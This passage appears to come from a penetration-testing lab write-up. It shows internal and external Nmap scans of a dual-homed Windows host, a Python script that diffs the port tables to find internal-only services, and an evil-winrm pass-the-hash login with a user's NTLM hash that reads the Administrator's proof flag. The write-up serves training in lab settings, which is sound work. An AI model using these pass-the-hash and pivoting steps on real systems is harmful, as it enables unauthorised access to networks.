nmap -sT -Pn -A 192.168.64.169

Nmap scan report for 192.168.64.169
Host is up (0.22s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 2 IP addresses (2 hosts up) scanned in 207.40 seconds

Now scan the same box from the inside (from the foothold on web05):

root@web05:/home# ./run-nmap.sh -Pn -A -p- 172.16.64.254
Starting Nmap 7.91SVN ( <https://nmap.org> ) at 2022-08-01 06:05 EDT
Nmap scan report for 172.16.64.254
Host is up (0.00026s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT      STATE SERVICE    VERSION
80/tcp    open  http       Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3128/tcp  open  http-proxy Squid http proxy 3.5.28
|_http-server-header: squid/3.5.28
|_http-title: ERROR: The requested URL could not be retrieved
**5985/tcp  open  http       Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)**
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49670/tcp open  msrpc      Microsoft Windows RPC
MAC Address: 00:50:56:86:39:F9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE
HOP RTT     ADDRESS
1   0.26 ms 172.16.64.254

OS and Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 174.97 seconds
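
The two scans differ only because the host is dual-homed: from 192.168.64.0/24 it exposes nothing but IIS on 80, while from 172.16.64.0/24 it also exposes Squid (3128), WinRM (5985) and RPC. A small parser that diffs the two Nmap port tables makes that internal-only exposure explicit. This is an added example, not part of the original write-up or of Nmap: the two scan excerpts are constructed from the port tables shown above, the parser handles Nmap's default "normal" output (not -oX/-oG), and the service notes in `INTERESTING` are our own labels.

```python
"""Diff an external and an internal Nmap scan of the same host and list the
services that are reachable only from the inside.

Added example (not from the original page). The scan excerpts below are
constructed from the port tables in the write-up; only Nmap "normal" output
lines of the form `PORT STATE SERVICE VERSION` are parsed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# One Nmap normal-output port line: "5985/tcp  open  http  Microsoft HTTPAPI httpd 2.0"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


@dataclass(frozen=True)
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str


def parse_nmap_normal(text: str) -> dict[int, Port]:
    """Return {port_number: Port} for every port line in normal-format output.

    Header lines ("PORT STATE ...") and NSE script lines ("|_http-title: ...")
    do not match the regex and are skipped.
    """
    ports: dict[int, Port] = {}
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            num, proto, state, service, version = m.groups()
            ports[int(num)] = Port(int(num), proto, state, service, (version or "").strip())
    return ports


# Services that matter for pivoting / lateral movement. Labels are our own.
INTERESTING = {
    5985: "WinRM over HTTP - remote PowerShell; evil-winrm accepts an NTLM hash",
    5986: "WinRM over HTTPS",
    3128: "Squid proxy - candidate pivot / egress path",
    445: "SMB",
    3389: "RDP",
}


def internal_only(external: dict[int, Port], internal: dict[int, Port]) -> dict[int, Port]:
    """Open ports seen on the internal interface that the external scan did not see."""
    return {n: p for n, p in internal.items() if p.state == "open" and n not in external}


def report(external_text: str, internal_text: str) -> list[str]:
    """Human-readable lines for every internal-only port, sorted by port number."""
    ext = parse_nmap_normal(external_text)
    inner = parse_nmap_normal(internal_text)
    lines = []
    for n, p in sorted(internal_only(ext, inner).items()):
        note = INTERESTING.get(n)
        line = f"{n}/{p.proto} {p.service} {p.version}"
        if note:
            line += f"  <- {note}"
        lines.append(line.rstrip())
    return lines


# Constructed sample input, copied from the port tables in the write-up.
EXTERNAL_SCAN = """\
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
"""

INTERNAL_SCAN = """\
PORT      STATE SERVICE    VERSION
80/tcp    open  http       Microsoft IIS httpd 10.0
3128/tcp  open  http-proxy Squid http proxy 3.5.28
|_http-server-header: squid/3.5.28
5985/tcp  open  http       Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49670/tcp open  msrpc      Microsoft Windows RPC
"""

if __name__ == "__main__":
    for line in report(EXTERNAL_SCAN, INTERNAL_SCAN):
        print(line)
```

On the page's data this prints three lines, 3128, 5985 and 49670, which is exactly the attack surface the external scan hid; the 5985 line is what justifies the WinRM pass-the-hash attempt that follows.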

Log in over WinRM with pete's NTLM hash (pass-the-hash via evil-winrm's -H option):

┌──(kali㉿kali)-[~/Documents/osep/tools]
└─$ **evil-winrm -u ops.comply.com\\\\pete -H 6db6cfdf45964a02a80e85a7ab9f4314 -i 172.16.64.254**

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\\Users\\pete\\Documents> cd c:\\Users\\Administrator\\Desktop
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> more proof.txt
**5d725dccc25c82f36f0d9428096c5b6e**

*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 192.168.64.169
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.64.254

Ethernet adapter Ethernet1:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 172.16.64.254
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> hostname
proxy01
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop>